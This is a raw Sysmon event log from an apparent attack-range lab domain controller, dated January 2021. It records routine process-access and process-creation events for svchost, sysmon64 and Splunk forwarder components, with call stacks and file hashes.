13:36:27.824{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.824{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.824{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.824{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.824{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.824{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EDB-6005-9B00-00000000A301}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.824{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EDB-6005-9B00-00000000A301}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.824{59A5CD1D-8EDB-6005-9B00-00000000A301}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.308{59A5CD1D-8EDB-6005-9A00-00000000A301}48364796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.152{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EDB-6005-9A00-00000000A301}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.152{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.152{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.152{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.152{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.152{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.152{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.152{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.152{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.152{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.152{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EDB-6005-9A00-00000000A301}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.152{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EDB-6005-9A00-00000000A301}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:27.152{59A5CD1D-8EDB-6005-9A00-00000000A301}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:29.387{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EDD-6005-9C00-00000000A301}4704C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:29.387{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:29.387{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:29.387{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 